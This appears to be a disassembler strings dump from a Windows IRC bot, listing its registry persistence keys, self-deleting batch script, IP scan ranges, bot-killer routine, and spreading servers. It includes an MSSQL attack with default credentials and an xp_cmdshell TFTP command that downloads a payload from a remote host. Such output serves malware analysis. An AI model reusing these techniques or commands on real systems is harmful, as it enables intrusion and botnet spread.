sub_41142B(08d2):
	"CONOUT$"
sub_405266(090a):
	"KERNEL32.DLL"
sub_4190BD(0947):
	"@echo	off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
	"%s\\tmp-%i%i%i-%c%c%c.bat"
	"w"
	"%s"
sub_41B3D0(0e5a):
	"rb"
	"TFTP:	Send Complete To %s. %d	Total Sen"...
sub_419C6D(15eb):
	"SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
	"%s\\%s"
	"LDM"
	"NetDDE"
	"EventMessageFile"
sub_40F524(1716):
	"USER32.DLL"
	"MessageBoxA"
	"GetActiveWindow"
	"GetLastActivePopup"
	"GetUserObjectInformationA"
	"GetProcessWindowStation"
sub_418396(17c7):
	"%x"
sub_41A391(2b9b):
	"HARDWARE\\DESCRIPTION\\System\\CentralProc"...
	"~MHz"
	"ProcessorNameString"
	"%s"
	"%s%c"
	"Unknown"
	"HARDWARE\\DESCRIPTION\\System\\CentralProc"...
sub_41748B(2ce1):
	"qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
	"["
	"%s%s|"
	"%s%s|"
	"%sP|"
	"%s0%I64u|"
	"%s%I64u|"
	"%s%c"
	"%s]"
sub_417676(2e07):
	" "
	"-s"
	"/s"
	" "
sub_4196D1(2f90):
	"hJdXZOPvUVmRJfVS"
sub_419347(4006):
	"192.168.*.*"
	"10.*.*.*"
	"111.*.*.*"
	"15.*.*.*"
	"16.*.*.*"
	"101.*.*.*"
	"110.*.*.*"
	"112.*.*.*"
	"172.%d.*.*"
sub_4113D0(4634):
	"KERNEL32"
	"IsProcessorFeaturePresent"
sub_410A54(4658):
	"e+000"
sub_41802F(4738):
	"%s %s\r\n"
	"%s-%s"
	"%s %s\r\n%s %s 0 0 :%s\r\n"
sub_419677(4a5c):
	"user32.dll"
sub_416F86(50c0):
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
sub_40A42B(58d9):
	"pow"
	"exp"
	"exp"
	"log10"
	"log10"
	"log"
	"log"
	"pow"
	"pow"
	"exp10"
sub_417361(5fcf):
	"%s %s %s\r\n"
sub_41B1A0(6107):
	"sa"
	"root"
	"admin"
	"DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
	"EXEC master..xp_cmdshell 'tftp -i %s GE"...
	"%s: Exploited	%s."
sub_4081FF(6a78):
	"ccs="
	"UTF-8"
	"UTF-16LE"
	"UNICODE"
sub_419477(6d5f):
	"Registry	Monitor"
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
	"QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
sub_40CB14(7249):
	"kernel32.dll"
	"InitializeCriticalSectionAndSpinCount"
sub_4184BF(726a):
	"\r\n"
	" "
	" "
	" "
	"\r\n\r\n"
sub_40AA15(7887):
	KERNEL32.UnhandledExceptionFilter
sub_40468E(7a5e):
	KERNEL32.UnhandledExceptionFilter
sub_419A9F(7c37):
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
sub_418E51(7d6d):
	"VIS"
	"2K3"
	"XP"
	"2K"
	"ME"
	"98"
	"NT"
	"95"
	"UNK"
	"[OS: Microsoft Windows %s %s (%i.%i bui"...
	"%s"
sub_418FC6(88b5):
	"%d.%d.%d.%d"
sub_41829C(8bd0):
	"%s %s\r\n"
sub_41A5C1(8db9):
	"http://%s:%d/%s"
	"http://%s:%d/%s"
sub_41783D(93dd):
	"%s"
	" :"
	"%s"
	" "
	"%s"
	" "
	"%s %s\r\n"
	"%s %s %s\r\n"
	"001"
	"%s %s %s\r\n%s %s %s\r\n"
	"332"
	" :"
	"%s"
	"!"
	"%s"
	"332"
	"%s"
	"%s"
	"%s"
	";"
	";"
	";"
sub_418B1F(9941):
	"%s\\%s"
sub_4054D6(a9bf):
	"KERNEL32.DLL"
	"FlsGetValue"
	"FlsSetValue"
	"FlsFree"
sub_419EA0(aba5):
	"OpenThread"
	"kernel32.dll"
	"OpenProcess"
	"kernel32.dll"
	"CreateToolhelp32Snapshot"
	"kernel32.dll"
	"Process32First"
	"kernel32.dll"
	"kernel32.dll"
	"kernel32.dll"
	"Module32Next"
	"kernel32.dll"
	"kernel32.dll"
	"Thread32Next"
	"kernel32.dll"
	"ReadProcessMemory"
	"kernel32.dll"
	"GetModuleFileNameExA"
	"psapi.dll"
	"%s\\%s"
	"SeDebugPrivilege"
	"SeDebugPrivilege"
	"System"
	"Bot Killed: %s"
sub_418D17(aecd):
	"HS"
sub_418552(b570):
	"GET"
	"Que?"
	"HTTP/1.1 501 Not Implemented\r\nContent-L"...
	"%s\\%s\\%s"
	"%s\\%s\\%s%s"
	"%s\\%s"
	"Que?"
	"Que?"
	"HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
	"HTTP:	Transfer: %d.%d.%d.%d (N/A). %d	T"...
	"HTTP:	Transfer: %d.%d.%d.%d (%s). %d To"...
sub_407881(bdfc):
	"mscoree.dll"
	"CorExitProcess"
sub_41A9DE(c258):
	"."
	"\\\\%s\\ipc$"
	"\\\\%s\\pipe\\browser"
	"http://%s:%d/%s"
	"http://%s:%d/%s"
	"%s: Exploited: %s."
sub_418C40(c642):
	" "
sub_409AB4(cd6e):
	"Runtime Error!\n\nProgram: "
	""
	"..."
	"\n\n"
	"Microsoft Visual C++ Runtime Library"
sub_41B775(dd03):
	"TFTP	Server"
sub_4019F3(e2f5):
	"­¡×¥¤Ð£§Ñ¤¤­¡£Ð­¤Ð§ÑÑ£¬¤Ó×­ÖЬ ¢¢×¦ ÐЦ"...
sub_412AB1(e396):
	"1#SNAN"
	"1#IND"
	"1#INF"
	"1#QNAN"
sub_405193(e3a2):
	"KERNEL32.DLL"
sub_405127(e3a2):
	"KERNEL32.DLL"
sub_417119(e4c8):
	"%s\\%s"
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
	"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
sub_4101BD(e6d5):
	KERNEL32.UnhandledExceptionFilter
sub_417F01(ef3c):
	"\r\n"
	"%s"
	"\r\n"
sub_41B7F9(f270):
	"%s"
	"%s%X"